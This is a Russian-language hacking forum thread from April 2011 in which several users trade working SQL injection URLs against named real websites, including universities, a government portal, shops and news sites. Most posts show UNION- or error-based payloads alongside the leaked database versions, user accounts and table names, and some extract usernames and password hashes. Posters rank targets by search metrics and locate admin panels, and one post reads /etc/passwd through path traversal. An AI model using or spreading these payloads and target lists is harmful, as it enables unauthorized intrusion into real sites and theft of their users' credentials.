Смотреть полную версию : SQL Инъекции
Московский государственный университет имени М.В.Ломоносова
Факультет вычислительной математики и кибернетики
Кафедра нелинейных динамических систем
и процессов управления
http://ndsipu.cmc.msu.ru/cp/ - админка)
http://ndsipu.cmc.msu.ru/pages.php?id=-28'+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10--+
ndsipu@fampmara:ndsipu:5.0.89
http://www.alexhotel.pl/en/index.php?ids=-1011+union+select+1,2,3,group_concat%280x3c62723e,concat_ws%280x203a3a3a20,unhex%28hex%28username%29%29,unhex%28hex%28password%29%29,unhex%28hex%28email%29%29%29%29,5,6,7,8,9,10+from+jos_users%20--
http://www.springofculture.org/info.php?pn=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat%280x3c62723e,concat_ws%280x203a3a3a20,username,email,password%29%29,15,16,17,18,19,20,21,22,23+from+2030web.jos_users%20--
http://www.uipre.org/members/kontakt.php?num=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,group_concat%280x3c62723e,concat_ws%280x203a3a3a20,loginname,email,password,passwordchanged,superuser%29%29+from+maillist_admin%20--
http://www.hccw.com/displayAttorney.php?num=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat%280x3c62723e,concat_ws%280x203a3a3a20,email,pw,user_admin%29%29+from+users%20--
http://www.psychiatry.ru/stat.php?num=-52+union+select+1,2,group_concat%280x3c62723e,concat_ws%280x203a3a3a20,login,password,access%29%29+from+cns_users%20--
http://www.bhutan.gov.bt/government/newsDetail.php?id=-1758+union+select+1,group_concat%280x3c62723e,concat_ws%280x203a3a3a20,USERNAME,PASSW%29%29,3,4,5,6,7,8+from+users%20--
п.с. уберите пробельчики, "форум" наставил непонятно зачем
CodeSender:)
03.04.2011, 08:34
http://www.snezhiki.ru/start.php?mult=27+union+select+1,version%28%29,3,4,5,6,7,8,9
http://www.seeduintahbasin.com/wp-content/plugins/wpforum/sendmail.php?action=quote&id=1%20union%20select%20version(),2,3%20--%20
5.1.54
Megwarez
03.04.2011, 10:00
http://pavlodarauto.kz/info/view.php?id=-90+union+select+1,2,3,4,group_concat%280x0b,table_name%29,6,7,8,9,10+from+information_schema.tables--
тиц 10
http://www.yms-pack.com/eng/products/main.php?cid=-7+union+select+1,2,3,group_concat%280x0b,nick,pwd%29,5,6,7+from+you_admin+--
PR 3
Не нашел админку
http://portirkutsk.ru/links/index.php?t=sub_pages&cat=-12%20and%201=2%20union%20select%20concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
[COLOR=Sienna]4.1.11 portirkutsk_5@localhost portirkutsk_0005 unknown-freebsd5.3[/COLOR]
CodeSender:)
03.04.2011, 14:13
http://www.turgus.lt/view.php?page=0&id=134&sub=2001+union+select+1,2,concat_ws%280x3a,login,pass%29,4+from+users+--+
http://www.altavet.ru/catalog.php?id_sec=4129+UnIon+selECt+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--+
[5.0.90]
http://www.rostov-info.ru/do.php?m=29+UnIon+selECt+1,2,3,4,5,version(),7,8--+
[4.1.25-log]
http://www.bigmag.ru/index.php?cat=5&his=4&cid=66+union+select+version()--+
[5.0.51a-24+lenny5-log]
http://mercedesnow.ru/mersedesremont.php?id=216+union+select+1,2,3,version()--+
[5.0.92-community]
http://www.nesiti.com/destiny.php?id=-10032/*!union*/%20seleCt%20version%28%29--%201
[5.1.52]
http://www.cheap-bulgarian-house.co.uk/houses_in_bulgaria_for_sale.php?id=-2605+UnIon+selECt+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47--+
[5.0.67-1~ui40+2]
http://paradyz.dn.ua/catalog/show/?id=-14+union+select+version(),2--+
[5.0.51a-24+lenny5-log]
http://www.vkrizis.ru/videoarc.php?arc=-1+union+select+1,2,3,4,5,version%28%29,7,8,9+--+[COLOR=Teal]pr4 тиц500[/COLOR]
http://ridjey.ru/index.php?engview&engviid=4+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,version%28%29,user%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68+--+[COLOR=Teal]pr5 тиц325[/COLOR]
http://www.nugabestrostov.ru/item.php?id=-2+union+select+1,concat_ws%28version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,12,13--
nugarostov_db5.0.51a-24+lenny5-logwww@10.0.0.3
http://www.marbel.ru/templats/page.php?id=-63+union+select+1,2,3,4,5,6,concat_ws%28version%28%29,database%28%29,user%28%29%29,8,9--
test5.0.33site1@localhost
CodeSender:)
04.04.2011, 01:57
http://www.aclab.ru/gallery.php?id_catalog=2+union+select+1,version%28%29,3,4,5--+
[4.1.25-log]
http://www.globotour.kz/default.php?ch_id=255/*!union*/select+1,2,3,4,5,version(),7,8+--+
[5.0.92-community]
http://sport.infotree.ru/index.php?m=clause&action=preview_clause&id_cl_cat=2&id_clause=6+and+1=2+union+select+version%28%29,2,3,4+--+
[4.0.26-SMP-log]
1) http://www.srilankatravelcentre.com/pages.php?id=-19%27+union+select+1,2,3,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+
5.0.77:srilankatc@localhost:srilankatc0
2) http://bbyloosediamonds.com/pages.php?id=-1+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9
5.0.91-log:dbbby@173.201.196.66:dbbby
3) http://cameralucida.ucsd.edu/pages.php?id=-4003+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,10,11,12,13
5.1.33:music@localhost:music
4) http://www.standardbred.org/pages.php?id=-5+union+select+1,2,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29
5.0.77:standardbr1@194.1.150.51:standardbr1
5) http://www.kayuarum.com/pages.php?id=-10%27+union+select+1,2,3,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,5--+
5.0.91-community:kayuarum_root@localhost:kayuarum_kayu
6) http://www.stephenturoff.com/slo/pages.php?id=Socerbe%27union+select+1,2,3,4,5,6,7,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,9,10--+
5.1.54:breda_vesel01@localhost:bredavsio7708net2753_vukbre01
http://www.wv-rothe.de/bookpage.php?id=-2+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--
http://ksk-luch-tennis.ru/show.php?id=2+union+select+1,2,3,4,5,6,password,8,9,10,11+from+o_admin--
хэши жопа
http://www.mortemzine.net/show.php?id=-2522+union+select+1,2,3,4,concat_ws%28char%2858%29,version%28%29,database%28%29,user%28%29%29,6,7,8,9,10,11,12,13,14,15+--++
VerFrydAdmin:b88a58aba08540dc40707d0abfe742b7
http://s44.radikal.ru/i105/1104/48/22a5835ae72c.jpg
http://www.1-800people.com/product.php?intProductID=-356+union+select+1,@@version,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21+--+
[COLOR=PaleGreen]5.0.45-log
PR 5[/COLOR]
http://www.gilcentr-sk.ru/?id=4+union+select+1,2,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,4,5,6,7,8,9--
1gb_gilc:4.1.21-community-max-nt-log:1gb_gilc@10.0.1.36
http://www.ryannel.ru/main.phtml?clon=main&rubrica=10&lang=rus&lastposit=0&id=-46+union+select+1,2,concat_ws%28database%28%29,version%28%29,user%28%29%29,4--
4.1.22-logrjannelrjannel@localhost
Megwarez
05.04.2011, 15:47
[COLOR=DarkGreen]PR2[/COLOR]
http://bromleystone.co.uk/cms.php?ID=-1+union+select+1,2,group_concat%280x0b,table_name%29,4,5,6,7+from+information_schema.tables+--
http://www.firenzegoldfilled.com/loja_lista.php?lancamento=n&id_estrut=-3+union+select+1,2,3,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,5,6,7,8,9,10,11,12,13,14,15--&id=1
firenzebrasil:5.1.56:firenzebrasil@10.5.3.70
http://www.elock2u.net/faqs.php?cat_id=-20+union+select+1,2,3--+
http://www.celette.com/index.php?id=3&L=-2+union+select+1,2,3,4,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,6,7--
typo3_celette:5.0.44-log:root@localhost
http://www.antiochwebhost.com/FAQ2.php?id=-40'+union+select+1,2,3,4,5,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,7,8,9,10,11,12,13--+
5.1.56:antioch@localhost:antioch
DezMond™
06.04.2011, 16:41
www.uni-hohenheim.de PR7 ТИЦ150
https://www.uni-hohenheim.de/astafilm/index.htm?af_archiv_detail.php?semid=-19+union+select+1,2,group_concat(concat_Ws(0x3a3a,table_schema,table_name)),4,5,6,7+from+information_schema.tables+group+by+table_schema+limit+0,1+--+
http://i065.radikal.ru/1104/f0/7eb210e628fe.jpg
http://www.eastvillageradio.com/content/content.php?id=-1197+union+select+1,version(),3,4,5,6+--+
[COLOR=PaleGreen]PR 5[/COLOR]
Сервер BT2 [FONT=Arial Black]byfly.by[/FONT]
[COLOR=White]http://hl.byfly.by/bf2statistics/?rid=-7704+union+select+database(),2,3,4,5,6,7,8,9,10,11,12,13,14,15--[/COLOR]
Version = 5.0.51a-24+lenny2
Current User = bf2stats@localhost
Current Database = bf2stats
[SIZE=1]ТИЦ 220
Rank 4/6[/SIZE]
http://www.passengers.com.ua/index.php?page=buses&id=-6+union+select+1,2,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
passeng_db:5.1.55: passeng_db@localhost
http://pueblorocio.com/?selectLang=DE&prevLang=SV&prevLang=DE&module=help.php&id=-31'+union+select+1,2,3,4,5,version(),7,8,9,10,11, 12,13+--+
[COLOR=PaleGreen]4.1.22-standard-log[/COLOR]
Megwarez
07.04.2011, 15:09
[COLOR=DarkGreen]тиц 10 PR1[/COLOR]
http://www.kitefestpasirgudang.com/Content.php?id=-1+union+select+group_concat%280x0b,table_name%29,2,3,4+from+information_schema.tables+--
[COLOR=DarkGreen]PR3[/COLOR]
http://www.nobeleye.tw/doctor-cont.php?id=-1+union+select+1,2,3,4,5,version%28%29,7,8,9,10,11,12,13,14,15,16,17+--
[COLOR=DarkGreen]PR3[/COLOR]
http://www.4audio.rs/type.php?id=-1+union+select+1,group_concat%280x0b,table_name%29+from+information_schema.tables+--
http://www.modernmobler.com/item.php?item_id=-369+union+select+version(),2,3,4,5,6,7,8,9,10,11, 12+--+
[COLOR=PaleGreen]5.0.91-log
PR 3[/COLOR]
http://www.sentido.ru/songs.php?id_song=-579'%20union%20select%20concat_ws(0x3a,user_login,user_pass),2,3,4,5%20from%20users+--+
http://ivelepraha.cz/products.php?id=-325+UnIon+selECt +1,2,3,4,5,version(),7,8,9,10,11,12,13+--+
[COLOR=PaleGreen]5.0.27-log[/COLOR]
Megwarez
08.04.2011, 18:03
[COLOR=DarkGreen]PR4[/COLOR]
http://www.gyorgytea.hu/gyorgytea-it.php?id=1&lato=gyogynovenyek_betegsegekre&gyid=-2+union+select+1,2,3,4,group_concat%280x0b,table_name%29,6,7+from+information_schema.tables+--
[COLOR=DarkGreen]PR2[/COLOR]
http://www.marsfigures.com/main.php?id=-1+union+select+1,2,3+--
[COLOR=DarkGreen]ТИЦ 10, PR4, DMOZ[/COLOR]
http://www.cosylogis.com/paris/map.php?id=-1+union+select+1,2,3,4,5,6,group_concat%280x0b,table_name%29,8,9+from+information_schema.tables+--
good.god
08.04.2011, 20:32
http://www.dntpasteur.ru/news.php?number=-1+union+select+1,2
5.1.47-log:host6251:host6251@localhost
http://www.spielelive24.de/kat.php?kat=-1'+union+select+1,2,3,4,5,6,7+--+
[COLOR=PaleGreen]Flash-Onlinegames![/COLOR]
http://gorodsokol.ru/img/logo-m.jpg
http://gorodsokol.ru/?id=news&id_news=-277%20and%201=2%20union%20select%201,2,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),4,5,6,7,8,9,10--
[COLOR=Sienna]5.0.87-percona-highperf-log a5438_sokolusr@10.0.1.7 a5438_sokol unknown-linux-gnu[/COLOR]
http://gorodsokol.ru/?id=news&id_news=-277%20and%201=2%20union%20select%201,2,concat_ws(char(58),user_login,user_pass,user_email),4,5,6,7,8,9,10%20from%20wpu_users--
http://gorodsokol.ru/?id=news&id_news=-277%20and%201=2%20union%20select%201,2,concat_ws(char(58),user_login,user_pass,user_email,user_nicename),4,5,6,7,8,9,10%20from%20wp_users--
расшифруете пассы, будет щастье)))
http://medilive.ru/article.php?id=-1209'+union+select+1,2,version(),4,5,6,7,8,9+--+
[COLOR=PaleGreen]5.1.50-lk-log
PR 3[/COLOR]
http://www.tverpk.ru/companynews.php?Id=&offerid=-84+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,10,11,12,13,14,15,16--
tverpkr3_wwwtverpkru:4.1.25-log:tverpkr3_@localhost
http://piczmerida.com/portafolio.php?idAlbum=-7'+union+select+1,2,version(),4,5+--+
[COLOR=PaleGreen]5.0.91-log[/COLOR]
1) http://www.wandah.com/play-games.php?id=-7743'+union+select+1,2,3,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,5,6,7,8,9,10,11,12,13,14--+
5.1.53-log:wandahtheflash@iceman.dreamhost.com:wandahgames
2) http://howsyourgame.com/game.php?id=-63'+union+select+1,2,3,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29--+
5.1.39-log:ffg27ej@69.163.163.193:lookup
3) http://www.chrisandsam.com/games/game.php?id=-172'+union+select+1,2,3,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,5--+
5.1.39-log:stabby@blackhawks.dreamhost.com:hippyfungames
4) http://www.prorealestatecity.com/profile_view.php?uid=26%27+and+1=2+union+select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,2--+
5.0.45:proreale@brilliant.brilliantdns.net:prorealestatecity
bloodAngel
09.04.2011, 17:18
Howars Country police .....
http://www.hcpoa.com/readnews. php?id=1%27
blind-sql : version - 3.23.58
blind
http://www.delmaralumni.com/readNews.php?id=- 20+union+select+1,2,3,4,5,6,--
version : 5.0.45
stepashka_
09.04.2011, 22:39
http://www.hoook.ru/ind.php?pn=1&id_typ=-152+union+select+1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+information_schema.tables--+
5.1.53-log
http://www.hispanicheritage.org/press_news.php?id=-180+union+select+1,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,3,4--
hispanj6_hhawards:5.1.47-community-log:hispanj6_hhf2@localhost
ТИЦ 60
http://www.avsshop.ru/index.php?idtov=871291+and+1=2+union+select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,2--+
5.1.50-log:u278685@10.8.3.21:u278685_2
p.s. "Маленький" облом на Админке ;)
stepashka_
10.04.2011, 07:53
http://www.rabotniki66.ru/ind.php?pn=1&id_categ=-13+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--+
4.1.24-max-log
http://www.mckn.ru/gocka/ind.php?pn=3&id_categ=-3+union+select+1,2,3,4,5,UNHEX(HEX(version())),7,8,9,10,11,12,13,14,15--+
http://www.mckn.ru/admin/
4.1.11-Debian_4sarge5-log
тиц 120 pr 2
http://objavlenij.net/ind.php?pn=30&id_categ=8+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+
http://objavlenij.net/Admin/
5.0.92-community-log
http://www.prodamzoo.ru/ind.php?pn=1&id_typ=-176+union+select+1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables--+
http://www.prodamzoo.ru//Admin/
5.0.77-log
http://s48.radikal.ru/i120/1104/9d/ed23298c9306.jpg
http://www.ima-api.com/about.php?act=detail&id=-93+union+select+1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9+--+
[COLOR=PaleGreen]
5.0.27-standard:u6183_imaAPI09@localhost:u6183_imaAPI09: pc-linux-gnu.[/COLOR]
http://www.ima-api.com/about.php?act=detail&id=-93+union+select+1,concat_ws(0x3a,name, passwd),3,4,5,6,7,8,9+from+tbuser+--+
[COLOR=PaleGreen]PR 4[/COLOR]
http://www.galoshishoes.ru/katalog.php?id=-20+union+select+1,2,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,4,5,6,7,8--
b55136:5.0.90:u55136@78.108.84.81
SergioBlog
10.04.2011, 12:30
Вопрос по поводу иньекции:
<p class='error'>query failed<br>SELECT * FROM campus WHERE campus_id = 9999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- <br>The used SELECT statements have a different number of columns</p>
А когда добавляю ещё одно поле, то выдаёт:
Notice: Undefined index: notify_list in /var/www/email/index.php on line 86
<p class='error'>query failed<br>SELECT program_name FROM program WHERE program_pk = <br>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1</p>
Количество полей получается подобрал? Но как действовать тут дальше?
bloodAngel
10.04.2011, 12:35
[QUOTE=SergioBlog]Вопрос по поводу иньекции:
А когда добавляю ещё одно поле, то выдаёт:
Количество полей получается подобрал? Но как действовать тут дальше?[/QUOTE]
делай вывод через помилку, сайт в студию)
SergioBlog
10.04.2011, 12:58
Всё допилил, спасибо за ответ :)
SergioBlog
10.04.2011, 13:27
Сори ошибся топиком =\
stepashka_
10.04.2011, 14:05
http://www.biznes-navigator.ru/ind.php?pn=1&id_typ=176+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+
http://www.biznes-navigator.ru/Admin/
5.0.91-community
http://saratov.dohod.info/doska/ind.php?pn=52&id_categ=-24+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15--+
4.1.25-log
http://www.gisupport.ru/info.php?id=-12+union+select+1,2,3,4,5,6,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,8,9,10,11,12--
compnn_test:5.0.90-log:compnn_test@localhost
http://www.landlords.ru/fullnews.php?id=-100+union+select+1,group_concat%28username,char%2858%29,password%29,3,4,5+from+admin%20--
idinahuihakergolimiy :D
уже кто-то здесь побывал)
ТИЦ - 325
http://www.autoexpres.ru/cars1.php?mode=card&p=0&sort=0&updown=0&foto=1&id=-23427+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,39,40,41,42,43,44,45,46,47,48,49,50,51,52--
5.1.46:admin_expres@localhost:admin_expres
52 колонки, пипец :D
stepashka_
10.04.2011, 22:20
http://www.elecab.ru/board/ind.php?pn=1&id_categ=-62+union+select+1,2,3,4,5,version(),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+--+
4.1.25-log
тиц 20
http://www.fazendeiro.ru/board/ind.php?pn=3&id_categ=-40+union+select+1,2,3,4,5,version(),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+--+
4.1.25-log
тиц 40
http://www.sozdanie.com/index.php?date='2705.04.11
Вот удалось найти уязвимость!
http://www.yotaservis.ru/goods.php?id=43+union+select+1,2,3,4,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,6,7,8,9,10--
db8508a:5.1.54-log:us8508a@10.0.1.38
http://ctdcom.ru/dizpr.php?id=1+union+select+1,2,3,4,5,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29--
u0735336_std:5.5.9:u0735336_stdcom@localhost
Skofield
11.04.2011, 02:25
[QUOTE=IScript]http://www.sozdanie.com/index.php?date='2705.04.11
Вот удалось найти уязвимость![/QUOTE]
[COLOR=Green]2.[/COLOR]
Инъекции вида:
http://site.ru/index.php?a='
будут удаляться.
http://www.sozdanie.com/index.php?date=2705.04.11'+union+select+1,version(),3,4,5,6,7,8,9,0,11/*
stepashka_
11.04.2011, 10:06
http://board.tachki-lestnici.ru/ind.php?pn=274&id_categ=-10+union+select+1,2,3,4,5,6,concat_ws(0x3a,USER(),DATABASE(),VERSION()),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--+
mrinstrum_board3@localhost:mrinstrum_board3:5.0.26-log
тиц 10
[SIZE=3]Universidad Blas Pascal : [COLOR=Green]PR - 6[/COLOR][/SIZE]
[COLOR=Sienna]Эксплойт[/COLOR]
http://www.ubp.edu.ar/enviar_info.php?pageId=1+union+select+1,2,3,convert%28concat_ws%28%27%20:%20%27,version%28%29,database%28%29,user%28%29%29%20using%20latin1%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
DB VERSION:4.1.11-Debian_4sarge7-log
DB NAME: UBPSITE
USERNAME: ubpsite@localhost
http://www.kylincorp.com/en/pview.php?id=-646+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+
Колонка 3 попадает в функцию include()
http://www.ptk-tehgaz.ru/products.php?emc=2&id=-20+union+select+1,2,'../../../../../etc/passwd'--+
магия активирована, поэтому захексим
http://www.ptk-tehgaz.ru/products.php?emc=2&id=-20+union+select+1,2,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764--+
http://aalborgstift.dk/pdb/pview.php?id=-705+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,userId,userName,password),9,10,11+from+user+--+
[COLOR=PaleGreen]PR3[/COLOR]
veter069
13.04.2011, 11:46
http://www.elephant.se/search.php?q=%22%20and%201=2%20union%20select%20CONCAT(user(),0x3a,version())/*%20and%20char(124)%20user%20char(124)=0%22%20and%20%22x%22=%22x
http://www.master-naba.com/page.php?contentId=-377+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29--
username: [COLOR=DarkOrange]master_naba_com@85.235.130.54[/COLOR]
version: [COLOR=DarkOrange]5.0.45-log[/COLOR]
database: [COLOR=DarkOrange]master_naba_com[/COLOR]
Google PR: [COLOR=DarkOrange]5[/COLOR]
[COLOR=White]Вариант вывода error-based SQLi[/COLOR]
http://www.praguesociety.org/pastevent.php?eid=(select+min(@:=1)from+(select+1+union+select+2)k+group+by+concat(version(),@:=@-1))--+
http://www.decoecho.pl/site/gallery_authors.php?region=1&lang=1&autorid=(select+min(@:=1)from+(select+1+union+select+2)k+group+by+concat(version(),0x0,@:=@-1))--+
http://www.matrizenergetica.com.ar/noticias.php?pageNum_rsNoticias=0&totalRows_rsNoticias=20¬icia_categoriaID=10&autorID=(select+min(@:=1)from+information_schema.tables+group+by+concat(version(),@:=@-1))--+
http://isafran.com/irina/libros/isafran_resultado_escritores.php?autorid=(select+min(@:=1)from+user+group+by+concat(user(),0x3a,version(),@:=@-1))--+
http://thedivinemercy.org/news/event.php?EID=(select+min(@:=1)from+mysql.user+group+by+concat(user,0x3a,password,0x0,@:=@-1))--+
http://www.hurlinghampolo.com/polo_news.php?nid=(select+min(@:=1)from+users+group+by+(select+concat(username,0x3a,password,0x0,@:=@-1)from+users+limit+0,1))--+
ViewSonic ®
http://www.viewsonic.com.au/kbase/article.php?id=-128+union+select+1,group_concat%28CHAR%2832,58,32%29%20,username,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15+from+vsau.internal_users%20--
IP: 60.248.78.41 //Тайвань
user: web@localhost
database: vsau
tables
activity_log, auction_items, crt_displays, dist_info, ecard_categories, ecard_templates, enews, enews_clicks, eregtmp, finch_prize, finch_redeem, finch_sales_results, internal_groups, internal_users, kbase, lcd_displays, map_state, meta_specs, mktg_assets, model_prices, name_to_id, name_to_models, online_service, order_items, pr, product_info, product_reviews, programs, projectors, res_accounts, res_goods_io, res_inventory, res_level_history, res_sales_info, resellers, resinv_format, ressales_import_log, retained_values, user_info, vote, wareg, web_orders, web_promos
Skofield
15.04.2011, 00:25
http://www.wesleyan.edu.ph/media.php?id=-17+union+select+version(),2,3,concat(user(),0x3a,database())--
[COLOR=White]version: 5.0.91-community[/COLOR]
http://buddie.me/music.php?id=-113482+union+select+1,concat_ws(0x3a,name,password),3,4+from+users+--+
http://www.sirius.perm.ru/cat.php?part=-7%20and%201=2%20union%20select%201,concat_ws(char(58),@@version,user(),database())+--
[COLOR=Sienna]5.0.32-Debian_7etch1 sirius@hosting3.ccl.ru dbsirius_1[/COLOR]
http://oldtownrestaurant.co.uk/food.php?id=-1+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4+--+
[COLOR=PaleGreen]oldtown_sql@localhost: oldtown_sql:5.0.92-community[/COLOR]
Megwarez
17.04.2011, 12:23
http://www.mapadelisboa.com/li.php?id=-1+union+select+1,2,3,4,group_concat%280x0b,table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+information_schema.tables+--
[COLOR=DarkGreen]PR4[/COLOR]
Все норм выводится но админку не нашел
http://www.profumodizagara.com/ricette/rc.php?id=-1+union+select+1,2,group_concat%280x0b,table_name%29,4,5,6,7,8,9,10,11+from+information_schema.tables+--
[COLOR=DarkGreen]PR3, DMOZ[/COLOR]
http://www.pchelovod.com/index.php?correct=142%27+and+1=0++Union+Select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29--+
5.1.46: pchelovod_shop@localhost: pchelovod_shop
Вывод в титле
тиц 60
moodoone
17.04.2011, 20:46
http://chicken.kiev.ua/news_restoran.phtml?id=-2999+union+select+1,2,3,4,5,6,concat_ws(0x3a,email,login),8,9,10,11,12,13,14+from+login--
ТИЦ 220
PR 4
http://download.in.ua/program.phtml?os=win&id=999999.9+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C%28SELECT+concat%280x7e%2C0x27%2CCompany.Cm_email%2C0x27%2C0x7e%29+FROM+%60db_westbyte_1%60.Company+Order+by+Cm_email+LIMIT+0%2C1%29+--
Вывод в исходнике. Выводит юзверей.
[SIZE=1]<meta name="keywords" content="~'00790@mail.ru'~" />[/SIZE]
Тиц 40
PR 4
http://www.lawyersalliance.com.au/public.php?id=-25+union+select+1,2,cast%28concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29%20as%20binary%29,4,5,6,7,8%20from%20users--
Username: [COLOR=DarkOrange]ALA_admin@localhost[/COLOR]
Version: [COLOR=DarkOrange]4.1.11-standard[/COLOR]
Database: [COLOR=DarkOrange]ALA[/COLOR]
Google PR: [COLOR=DarkOrange]5[/COLOR]
admin (http://www.lawyersalliance.com.au:444/login.php)
Megwarez
18.04.2011, 18:23
http://www.g1expo.com/artists-ch.php?id=-1+union+select+1,2,3,4,5,group_concat%280x0b,table_name%29,7+from+information_schema.tables+--
[COLOR=DarkGreen]PR 5[/COLOR]
http://www.teleradiocom.tj/index.php?action=fullnews&id=-50 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,id,username,password),10,11,12,13,14,15,16,17,18,19 from users limit 0,1
[COLOR=DarkGreen]Helloworld.ru
[/COLOR]
Ашибочка :)
http://www.helloworld.ru/show.php?curraz=27+and+1=0+union+select+UNHEX%28HEX%28CONCAT_WS%280x3a,database%28%29,version%28%29,user%28%29%29%20%29%29
hellowor_hello:5.0.91-community:hellowor_hello@localhost
bloodAngel
19.04.2011, 08:23
shop ))
http://drsha.com/library/description.php?bookid=-1+union+select+1,concat%280x3a,version%28%29,0x3a,database%28%29%29
[COLOR=DarkGreen]5.0.41-community-log:[/COLOR] [COLOR=Black]ISMBMDR_webdb_drsha[/COLOR]
http://www2.hud.ac.uk/staffprofiles/staffcv.php?staffid=-508+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,22--
Username: [COLOR=DarkOrange]clseditor@tamnavulin.talisker.hud.ac.uk[/COLOR]
Version: [COLOR=DarkOrange]5.1.55-log[/COLOR]
Database: [COLOR=DarkOrange]staffprofiles[/COLOR]
Google PR: [COLOR=DarkOrange]4[/COLOR]
Cennarios
19.04.2011, 10:15
[COLOR=Red]http://www.unisdr.org/africa/events/index.php?rid=0&timeID=1&tid=0&oid=6)+or+1+group+by+concat((select+concat(user(),0x3a3a,User,0x3a3a,file_priv)+from+mysql.user+limit+3,1),floor(rand(0)*2))+having+min(0)--+&hid=60[/COLOR]
Баанк!!!(co Jay & Silent BOB) =)
Dr..VATSON
19.04.2011, 11:45
http://sbbrasil.com.br/php/paginas/site/jogador/verjogador.php?id=-19+union+select+1,2,3,4,5,version%28%29,7,8,9,10,11,12,13,14--
5.0.91-community
Какой-то шоп, PR-5
http://www.able.org/store/item-description.php?id=-5%27+union+select+1,2,3,4,5,6,7,8,version%28%29,10,11,12,13,14,15,16,17--+
verion - 5.0.77
Megwarez
20.04.2011, 17:24
http://www.iotma.ncku.[COLOR=Red]edu[/COLOR].tw/new.php?id=-1+union+select+1,group_concat%280x0b,table_name%29,3,4+from+information_schema.tables+--
[COLOR=DarkOliveGreen]5.0.45-community-nt[/COLOR]
